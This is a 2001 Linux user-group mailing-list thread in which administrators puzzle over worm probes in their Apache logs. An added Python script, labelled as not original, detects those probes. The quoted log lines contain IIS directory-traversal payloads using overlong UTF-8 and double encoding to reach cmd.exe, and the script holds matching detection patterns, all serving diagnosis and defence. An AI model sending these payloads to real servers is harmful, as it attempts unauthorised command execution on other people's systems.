[aclug-L] Re: Hacker or ??

To: <discussion@xxxxxxxxx>
Subject: [aclug-L] Re: Hacker or ??
From: Joshua S Brown <joshb@xxxxxxxxxxx>
Date: Tue, 18 Sep 2001 13:05:31 -0500 (CDT)
Reply-to: discussion@xxxxxxxxx

Looks like a new worm that tries to attack 16 vulnerabilities in IIS.
Wonderful for people who run Linux but are still being pounded.

Josh Brown

Anyone have any ideas to stop it or just grin and bear it?

On Tue, 18 Sep 2001, Steven Saner wrote:

>
> Appears that this is the worm that Glandix reported. I got the
> readme.exe email this morning as well. It was made to appear like a
> bounce back message from someplace.
>
> Steve
>
>
> On Tue, Sep 18, 2001 at 12:49:24PM -0500, Joshua S Brown wrote:
> >
> > We are having the same problem on all our web servers. Is this a hack or
> > something like code red?
> >
> >
> > Josh Brown
> >
> > On Tue, 18 Sep 2001, Maverick wrote:
> >
> > >
> > > Hi, all
> > > >  Recently I checked my Apache webserver access.log
> > > > and found a lot of entries like this:
> > > > 24.254.90.73 - - [18/Sep/2001:10:44:38 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> > > > 24.254.90.73 - - [18/Sep/2001:10:44:39 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> > > > 24.254.90.73 - - [18/Sep/2001:10:44:41 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> > > > 24.254.90.73 - - [18/Sep/2001:10:44:43 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> > > > .....
> > > >
> > > > Is that someone trying to access my /var/www/scripts/?
> > > > And my error.log generates something like this..
> > > > Tue Sep 18 10:52:27 2001] [error] [client 24.234.20.197] File does not exist: /var/www/c/winnt/system32/cmd.exe
> > > > [Tue Sep 18 10:52:28 2001] [error] [client 24.234.20.197] File does not exist: /var/www/d/winnt/system32/cmd.exe
> > > > ....
> > > >
> > > > Anyone have any idea? Or did I set something wrong?
> > > > Or do I really have a hacker knocking on my door?
> > >
> > > Thanks.
> > > Mav
> > >
> > > -- This is the discussion@xxxxxxxxx list.  To unsubscribe,
> > > visit http://tmp2.complete.org/cgi-bin/listargate-aclug.cgi
> > >
> >
> >
>
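
Added example (not part of the original thread): a small Python check that flags requests like the ones quoted above in an Apache access log, by decoding the request target repeatedly and looking for overlong UTF-8 bytes, double encoding, directory traversal and cmd.exe. The function names and the last sample line are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Common Log Format: ip, ident, user, [time], "METHOD target PROTO", status, size
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

def probe_reasons(target, max_rounds=3):
    """Return the reasons a request target looks like an IIS traversal probe."""
    reasons = set()
    data = target.encode("utf-8")
    for rounds in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        if rounds >= 1:  # a second percent-decode still changed the target
            reasons.add("double-encoding")
        data = decoded
    # 0xC0 and 0xC1 never start a valid UTF-8 sequence; as lead bytes they can
    # only form overlong encodings of ASCII characters such as "/" and "\".
    if b"\xc0" in data or b"\xc1" in data:
        reasons.add("overlong-utf8")
    norm = data.replace(b"\\", b"/").lower()
    if b"../" in norm:
        reasons.add("traversal")
    if b"cmd.exe" in norm:
        reasons.add("cmd.exe")
    return reasons

def summarize(lines):
    """Group flagged requests by client IP: count, reasons, status codes."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        reasons = probe_reasons(target)
        if reasons:
            e = hits.setdefault(ip, {"count": 0, "reasons": set(), "statuses": Counter()})
            e["count"] += 1
            e["reasons"] |= reasons
            e["statuses"][status] += 1
    return hits

# The four requests quoted in the thread (unwrapped) plus one constructed benign line.
SAMPLE = [
    '24.254.90.73 - - [18/Sep/2001:10:44:38 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231',
    '24.254.90.73 - - [18/Sep/2001:10:44:39 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215',
    '24.254.90.73 - - [18/Sep/2001:10:44:41 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215',
    '24.254.90.73 - - [18/Sep/2001:10:44:43 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231',
    '192.0.2.7 - - [18/Sep/2001:10:45:00 -0700] "GET /index.html HTTP/1.0" 200 1024',
]
```

Calling `summarize(SAMPLE)` groups all four quoted requests under 24.254.90.73 with status codes 404 and 400 only, meaning Apache served nothing for them.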

